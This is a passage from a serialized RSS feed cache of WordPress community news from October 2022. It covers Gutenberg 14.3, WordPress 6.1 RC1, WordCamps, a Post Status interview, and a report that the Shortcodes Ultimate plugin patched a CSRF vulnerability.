href=\"https://make.wordpress.org/core/tag/gutenberg-new/\">What’s new in Gutenberg</a>” posts to stay on top of the latest enhancements.</p>\n</blockquote>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<h2>WordPress Translation Day</h2>\n\n\n\n<p>On September 28, 2022, the Polyglots community celebrated <a href=\"https://wptranslationday.org/\"><strong>WordPress Translation Day</strong></a> (WPTD) with some global events throughout the week, including an <a href=\"https://wordpress.tv/2022/09/27/jesus-amieiro-alex-kirk-translate-wordpress-org-feedback-tool-walk-through/\">overview of the GlotPress feedback tool</a>. In addition, there were 13 local events in 11 different languages and across four continents.</p>\n\n\n\n<p>The Training Team joined the celebration by hosting a day-long event to help new contributors translate materials on learn.wordpress.org.</p>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p><a href=\"https://make.wordpress.org/polyglots/2022/10/04/2022-wordpress-translation-day-recap/\">Check out this recap</a> for more highlights from the event.</p>\n</blockquote>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<h2>Team updates: Dropping security updates for WP 3.7 – 4.0, a new developer-focused course, and more</h2>\n\n\n\n<ul>\n<li>The WordPress Security Team will no longer provide <a href=\"https://wordpress.org/news/2022/09/dropping-security-updates-for-wordpress-versions-3-7-through-4-0/\">security updates for WordPress versions 3.7 through 4.0</a> as of December 2022.</li>\n\n\n\n<li>The first developer-focused course, <a href=\"https://learn.wordpress.org/course/using-the-wordpress-data-layer/\">Using the WordPress Data Layer</a>, is live on Learn WordPress.</li>\n\n\n\n<li>The <a href=\"https://make.wordpress.org/community/2022/09/29/meetup-reactivation-update/\">Global Meetup Reactivation project</a> gathered 39 supporters worldwide so far. As a result of their efforts, 117 meetup groups have reactivated or plan to reactivate in 2022!&nbsp;</li>\n\n\n\n<li>Learn more about <code>do_action</code>’s charity hackathons and how to host one in <a href=\"https://make.wordpress.org/community/2022/09/22/meetup-organizer-newsletter-september-2022/\">the latest edition of the Meetup Organizer Newsletter</a>.</li>\n\n\n\n<li>Would you like to help create content for the <a href=\"https://learn.wordpress.org/\">Learn WordPress</a> platform? The Training Team shared a post on <a href=\"https://make.wordpress.org/training/2022/09/30/become-an-online-workshop-facilitator-or-tutorial-presenter-today/\">how to become an online workshop facilitator or tutorial presenter</a>.</li>\n\n\n\n<li>The WebP proposal was pulled from the upcoming WordPress 6.1 release in response to <a href=\"https://make.wordpress.org/core/2022/09/11/webp-in-core-for-6-1/\">this post and subsequent discussions</a>. Users can still get this feature using the <a href=\"https://wordpress.org/plugins/performance-lab/\">Performance Lab plugin</a>.</li>\n\n\n\n<li>WordPress co-founder Matt Mullenweg suggested <a href=\"https://make.wordpress.org/core/2022/09/11/canonical-plugins-revisited/\">revisiting canonical plugins</a> and adopting a plugin-first approach when developing new features for core.</li>\n\n\n\n<li>The Plugin Team <a href=\"https://make.wordpress.org/plugins/2022/09/13/heroku-free-tier-being-retired/\">reminds plugin authors using Heroku&#8217;s free services to update their services</a> after the company announced the removal of their free plans.</li>\n\n\n\n<li>The Openverse Team <a href=\"https://make.wordpress.org/openverse/2022/09/13/community-meeting-recap-13-september-2022/\">removed the ‘beta’ status</a> from audio support. Also, the index <a href=\"https://make.wordpress.org/openverse/2022/09/05/openverse-biweekly-update-september-5th/\">now includes iNaturalist</a>, making it easy to discover CC-licensed images of flora, fauna, and nature contributed by this community of scientists and naturalists.</li>\n\n\n\n<li>The Hosting and Documentation Teams are collaborating on the creation of a new <a href=\"https://make.wordpress.org/hosting/2022/09/07/wordpress-advanced-administration-handbook/\">WordPress Advanced Administration Handbook</a>.</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Want to create diverse and inclusive events that make the WordPress community stronger, but not sure where to get started? <a href=\"https://make.wordpress.org/community/tag/wpdiversity/\">Join WPDiversity to learn more about upcoming workshops</a>.</p>\n</blockquote>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<h2>Feedback &amp; testing requests</h2>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/community/2022/09/27/15-oct-survey-deadline/\"><strong>Last call to complete the Meetup Annual Survey</strong></a>! Help strengthen this global WordPress program by sharing your feedback by October 15, 2022.</li>\n\n\n\n<li>The Core Team is seeking <a href=\"https://make.wordpress.org/core/2022/10/10/seeking-proposals-for-interop-2023/\">proposals for Interop 2023</a>. Interop is an effort to improve interoperability across the three major web browser engines (Chromium, WebKit, and Gecko). You can submit yours until October 15, 2022.</li>\n\n\n\n<li>Don&#8217;t miss this call for testing on <a href=\"https://make.wordpress.org/themes/2022/09/12/testing-and-feedback-for-using-block-based-template-parts-in-classic-themes/\">using block-based template parts in classic themes</a>.</li>\n\n\n\n<li>The Community Team is gathering feedback on <a href=\"https://make.wordpress.org/community/2022/09/30/help-improve-the-make-community-contributor-day-onboarding/\">onboarding experiences at Contributor Days</a>.</li>\n\n\n\n<li>Version 20.9 of WordPress for <a href=\"https://make.wordpress.org/mobile/2022/10/04/call-for-testing-wordpress-for-android-20-9/\">Android</a> and <a href=\"https://make.wordpress.org/mobile/2022/10/04/call-for-testing-wordpress-for-ios-20-9/\">iOS</a> is available for testing.</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p><a href=\"https://wordpress.org/news/2022/10/episode-40-all-things-testing-with-special-guests-anne-mccarthy-and-brian-alexander/\">Tune in to the latest episode of WP Briefing</a> to hear guests Anne McCarthy and Brian Alexander discuss their work on the Testing Team and how you can get involved.</p>\n</blockquote>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<h2>Event updates &amp; WordCamps</h2>\n\n\n\n<ul>\n<li>The last batch of <a href=\"https://asia.wordcamp.org/2023/\">WordCamp Asia 2023</a> tickets will be released on October 19, 2022. The organizing team is also <a href=\"https://asia.wordcamp.org/2023/call-for-contributors-stories/\">calling for contributors’ stories</a>.</li>\n\n\n\n<li><a href=\"https://us.wordcamp.org/2022/\">WordCamp US (WCUS) 2022</a> was successfully held last month in San Diego, California. Following two days of presentations, workshops, and a <a href=\"https://make.wordpress.org/project/2022/09/19/wcus-2022-qa/\">Q&amp;A session with Matt Mullenweg</a>, more than 300 attendees participated in the <a href=\"https://make.wordpress.org/updates/2022/09/18/wordcamp-us-contributor-day-2022-recap/\">Contributor Day</a>. National Harbor, Maryland, will host <a href=\"https://us.wordcamp.org/2022/announcing-wordcamp-us-2023/\">next year’s WordCamp US</a> and a Community Summit on August 23-25, 2023.</li>\n\n\n\n<li>In addition to WCUS, four in-person WordCamps took place in September in <a href=\"https://jinja.wordcamp.org/2022/\">Jinja (Uganda)</a>, <a href=\"https://kathmandu.wordcamp.org/2022/\">Kathmandu (Nepal)</a>, <a href=\"https://netherlands.wordcamp.org/2022/\">The Netherlands</a>, and <a href=\"https://pontevedra.wordcamp.org/2022/\">Pontevedra (Spain)</a>. And more WordPress events are on the schedule for the rest of October:\n<ul>\n<li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1ea-1f1f8.png\" alt=\"🇪🇸\" class=\"wp-smiley\" /> <a href=\"https://valencia.wordcamp.org/2022/\">WordCamp Valencia</a>, Spain on October 21-22, 2022</li>\n\n\n\n<li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1e8-1f1ff.png\" alt=\"🇨🇿\" class=\"wp-smiley\" /> <a href=\"https://brno.wordcamp.org/2022/\">WordCamp Brno</a>, Czech Republic on October 22, 2022</li>\n\n\n\n<li><img src=\"https://s.w.org/images/core/emoji/14.0.0/72x72/1f1eb-1f1f7.png\" alt=\"🇫🇷\" class=\"wp-smiley\" /> <a href=\"https://lyon.wordcamp.org/2022/\">WordCamp Lyon</a>, France on October 28, 2022</li>\n</ul>\n</li>\n</ul>\n\n\n\n<blockquote class=\"wp-block-quote has-extra-large-font-size\">\n<p>Curious about attending a WordCamp event? Listen to <a href=\"https://wordpress.org/news/2022/09/episode-39-contributor-stories-live-from-wordcamp-us/\">contributor stories from WordCamp US 2022</a> on why they use WordPress and go to WordCamps.</p>\n</blockquote>\n\n\n\n<div class=\"wp-block-spacer\"></div>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\" />\n\n\n\n<p><strong><em><strong><em><strong><em>Have a story that we should include in the next issue of The Month in WordPress? <strong><em>Fill out </em></strong><a href=\"https://make.wordpress.org/community/month-in-wordpress-submissions/\"><strong><em>this quick form</em></strong></a><strong><em> to let us know.</em></strong></em></strong></em></strong></em></strong></p>\n\n\n\n<p><em><em>The following folks contributed to this edition of The Month in WordPress: </em><a href=\"https://profiles.wordpress.org/chaion07/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>chaion07</a>, <a href=\"https://profiles.wordpress.org/laurlittle/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>laurlittle</a>, <a href=\"https://profiles.wordpress.org/rmartinezduque/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>rmartinezduque</a>, <a href=\"https://profiles.wordpress.org/robinwpdeveloper/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>robinwpdeveloper</a>, <a href=\"https://profiles.wordpress.org/santanainniss/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>santanainniss</a>, <a href=\"https://profiles.wordpress.org/webcommsat/\" class=\"mention\"><span class=\"mentions-prefix\">@</span>webcommsat</a>.</em></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Oct 2022 10:07:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"rmartinezduque\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:27;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:53:\"WPTavern: Gutenberg 14.3 Improves Image Drag and Drop\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=138589\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"https://wptavern.com/gutenberg-14-3-improves-image-drag-and-drop\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2508:\"<p><a href=\"https://make.wordpress.org/core/2022/10/13/whats-new-in-gutenberg-14-3-12-october/\">Gutenberg 14.3</a> was released this week with drag-and-drop improvements for both the block editor and the site editor. Automattic-sponsored contributor Aaron Robertshaw published a video, illustrating how the block editor now supports  dropping an image onto an empty paragraph block to replace it with a new Image block.</p>\n\n\n\n\n\n\n\n<p>The site editor has also added drag-and-drop capabilities for blocks and patterns in the new zoomed-out view, which was added in <a href=\"https://wptavern.com/gutenberg-14-1-improves-navigation-block-adds-experimental-zoomed-out-view\">Gutenberg version 14.1</a>. It zooms out to focus on building and composing patterns, allowing users to move sections around without affecting the inner blocks. It can be enabled under &#8220;Experiments.&#8221; In 14.3, users can drag blocks and patterns right onto the canvas with an overhead view that makes it easy to place in between existing blocks.</p>\n\n\n\nvideo source: <a href=\"https://github.com/WordPress/gutenberg/pull/44402\">Gutenberg PR #44402</a>\n\n\n\n<p>This version also introduces new support for alt + arrow keyboard combinations for navigating blocks. Robertshaw explained how they work:</p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>For example, if your cursor is towards the end of a long paragraph, you can quickly press <code>alt + up arrow</code> to move to the beginning of that paragraph. If you are already at the beginning of a text block, you’ll move to the start of the previous paragraph. Similarly, <code>alt + down arrow</code> will move you to the end of a block of text.</p>\n</blockquote>\n\n\n\n<p>The Styles typography controls have been updated to include the Tools Panels that users have available in the Block Settings interface. This makes the experience more consistent and expands the capabilities to allow for resetting the values.</p>\n\n\n\n\n\n\n\n<p>This release includes dozens of fixes and improvements to design tools, components, the Block API, and more. Check out the changelog in the <a href=\"https://make.wordpress.org/core/2022/10/13/whats-new-in-gutenberg-14-3-12-october/\">announcement post</a> for the full list of updates.</p>\n\n\n\n<p>Gutenberg 14.3 will not be included in the upcoming WordPress 6.1 release but will be rolled into core the next time around. If you want these features now, you can <a href=\"https://wordpress.org/plugins/gutenberg/\">install the Gutenberg plugin</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 14 Oct 2022 05:10:03 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:28;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"Post Status: Till Krüss on WordPress, Performance, the Plugin Business, and Life\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=127829\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"https://poststatus.com/till-kruss-on-wordpress-performance-the-plugin-business-and-life/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2907:\"<div class=\"wp-container-23 wp-block-group eplus-wrapper has-theme-palette-2-color has-theme-palette-8-background-color has-text-color has-background\"><div class=\"wp-block-group__inner-container\"><div class=\"wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\">What plugin owner has not felt the pain of an extraordinarily busy support forum? Till is up to (wait for it..) 5-10 <em>minutes</em> a day on support — which he aims to <em>decrease</em>. How? Testing to ensure the highest quality. </p></div>\n\n\n<div class=\"wp-block-spacer eplus-wrapper\"></div>\n\n\n\n<p class=\"yoast-reading-time__wrapper\"><span class=\"yoast-reading-time__icon\"></span><span class=\"yoast-reading-time__spacer\"></span><span class=\"yoast-reading-time__descriptive-text\">Estimated reading time:  </span><span class=\"yoast-reading-time__reading-time\">4</span><span class=\"yoast-reading-time__time-unit\"> minutes</span></p>\n</div></div>\n\n\n\n<div class=\"wp-block-spacer eplus-wrapper\"></div>\n\n\n\n<p class=\"has-drop-cap eplus-wrapper\"><strong>Nexcess</strong> is <a href=\"https://www.nexcess.net/blog/nexcess-to-provide-premium-caching-to-all-customers-with-new-object-cache-pro-partnership/\">the latest host to adopt</a> <strong>Till Krüss</strong>&#8216;s <strong>Object Cache Pro</strong>, which offers a really interesting model for partnerships between a WordPress plugin product business and a valuable niche market: hosting companies and anyone running WordPress sites at scale. I recorded this conversation with Till back in August, and it\'s about time we pushed it out. This isn\'t the final cut for a <a href=\"https://poststatus.com/podcasts\">Post Status podcast</a>, but I wanted to release it now, as-is, since it\'s very timely. </p>\n\n\n\n<div>\n</div>\n\n\n\n<p class=\"eplus-wrapper\">Performance is a pressing concern for WordPress and WooCommerce — and a large part of the challenges people have running WordPress in the wild are plugins that have not been built and tested to perform at scale. There\'s likely a lot of opportunity in aligning on performance as a key, common interest for product, agency, and hosting companies in the WordPress space. <em>And</em>, as Till\'s example shows, a small WordPress company, or company of one that wants to stay that way, still can thrive today.</p>\n\n\n\n<p class=\"eplus-wrapper\">Till\'s particular niche is not for everyone, but some of his ideas are very portable. For one thing, what plugin owner has not felt the pain of an extraordinarily busy support forum? Till is up to (wait for it..) 5-10 <em>minutes</em> a day on support — which he aims to decrease. How? Testing to ensure the highest quality. It\'s an idea that needs to become a reality and a habit in the third party WordPress product ecosystem, Till insists — and I think he\'s right about that and much else. </p>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 13 Oct 2022 20:55:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:10:\"Dan Knauss\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:29;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"WPTavern: Shortcodes Ultimate Plugin Patches CSRF Vulnerability in Version 5.12.1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=138591\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:92:\"https://wptavern.com/shortcodes-ultimate-plugin-patches-csrf-vulnerability-in-version-5-12-1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1375:\"<p>The <a href=\"https://wordpress.org/plugins/shortcodes-ultimate/\">Shortcodes Ultimate plugin</a>, used on more than 700,000 WordPress sites for creating things like tabs, buttons, and accordions, has patched a vulnerability in version 5.12.1. The plugin&#8217;s changelog simply says, <em>&#8220;This update fixes a security vulnerability in the shortcode generator</em>. To the author&#8217;s credit,  the changelog clearly denotes it as a security update, although it doesn&#8217;t offer specific details. </p>\n\n\n\n<p>The vulnerability was reported by researcher Dave Jong at Patchstack and is <a href=\"https://nvd.nist.gov/vuln/detail/CVE-2022-38086\">logged at the National Vulnerability Database</a> (NVD) as a Cross-Site Request Forgery (CSRF) vulnerability leading to plugin preset settings change. It was patched two weeks ago and the NVD published the advisory this week.</p>\n\n\n\n<p>At this time, the vulnerability is not known to have been exploited, but users are advised to update to the latest version. Based on WordPress.org <a href=\"https://wordpress.org/plugins/shortcodes-ultimate/advanced/\">stats</a>, 46% of the plugin&#8217;s user base is running on versions older than 5.12.x. The Shortcodes Ultimate plugin author has since released version 5.12.2, which fixes an issue with the Shortcode Generator Presets that was introduced in the previous update.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 13 Oct 2022 18:03:36 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:30;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"Do The Woo Community: Custom Block Development and WooCommerce\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://dothewoo.io/?p=73122\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://dothewoo.io/devlife_snippet-custom-block-development-and-woocommerce/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:384:\"<p>It\'s safe to say that modern WordPress development is taking a very block-centric approach</p>\n<p>&gt;&gt; The post <a rel=\"nofollow\" href=\"https://dothewoo.io/devlife_snippet-custom-block-development-and-woocommerce/\">Custom Block Development and WooCommerce</a> appeared first on <a rel=\"nofollow\" href=\"https://dothewoo.io\">Do the Woo - a WooCommerce Builder Community</a>	.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 13 Oct 2022 10:09:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:31;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: WordPress 6.1 RC 1 Released, Ready for Testing and Translation\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=138506\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"https://wptavern.com/wordpress-6-1-rc-1-released-ready-for-testing-and-translation\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3202:\"<p>We are less than three weeks out from WordPress 6.1&#8217;s official release on November 1, 2022. <a href=\"https://wordpress.org/news/2022/10/wordpress-6-1-release-candidate-1-rc1-now-available/\">RC 1</a> was released this week, marking the <a href=\"https://make.wordpress.org/polyglots/handbook/glossary/#hard-freeze\">hard string freeze</a>, which means 6.1 is <a href=\"https://translate.wordpress.org/projects/wp/dev/\">ready to be translated</a>. </p>\n\n\n\n<p>The features landing in this release are heavy on block and site editor improvements that will bring users a greater level of design control. Many of these features have been tested in the Gutenberg plugin but will need further testing now that they are in core, including the expanded template experience, better placeholders for blocks, new modal interfaces and preferences improvements, and updated menu management. WordPress 6.1 includes 11 releases of the Gutenberg plugin (13.1 &#8211; 14.1).</p>\n\n\n\n<p>If you are monitoring <a href=\"https://make.wordpress.org/core/\">WordPress&#8217; core development blog</a>, you may have seen the deluge of dev notes coming in ahead of 6.1. A few of the highlights include the following: </p>\n\n\n\n<ul>\n<li><a href=\"https://make.wordpress.org/core/2022/10/12/block-api-changes-in-wordpress-6-1/\">Block API changes in WordPress 6.1</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/10/block-styles-generation-style-engine/\">Block styles generation (Style Engine)</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/10/editor-components-updates-for-wordpress-6-1/\">Editor Components updates in WordPress 6.1</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/11/simplified-data-access-with-new-react-hooks-in-wordpress-6-1/\">Simplified data access with new React hooks in WordPress 6.1</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/03/fluid-font-sizes-in-wordpress-6-1/\">Fluid font sizes in WordPress 6.1</a></li>\n\n\n\n<li><a href=\"https://make.wordpress.org/core/2022/10/07/create-block-scaffolding-tool-updates/\">Create-block scaffolding tool updates</a></li>\n</ul>\n\n\n\n<p>The <a href=\"https://make.wordpress.org/core/2022/10/12/wordpress-6-1-field-guide/\">WordPress 6.1 Field Guide</a> has also been published. This guide includes all the technical details of the changes coming in the release, as well as the full collection of dev notes. There are a good number of updates that fall outside of the editor with ticket references in the Field Guide, including error logging and hooks added to <code>wp-cron.php</code>, database updates, addition of required attribute for required inputs on multisite site registration, updates to external libraries, REST API improvements, and many more miscellaneous core updates.</p>\n\n\n\n<p>Plugin and theme developers are encouraged to test their extensions against RC1 and update the “<em>Tested up to”</em> version in the readme file. WordPress testers who are not comfortable <a href=\"https://core.trac.wordpress.org/newticket\">filing a Trac ticket</a> for bugs should report them to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area</a> in the support forums.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 12 Oct 2022 21:59:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:32;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"Post Status: WordPress 6.1 RC1 • DevNotes • Field Guides • New LearnWP 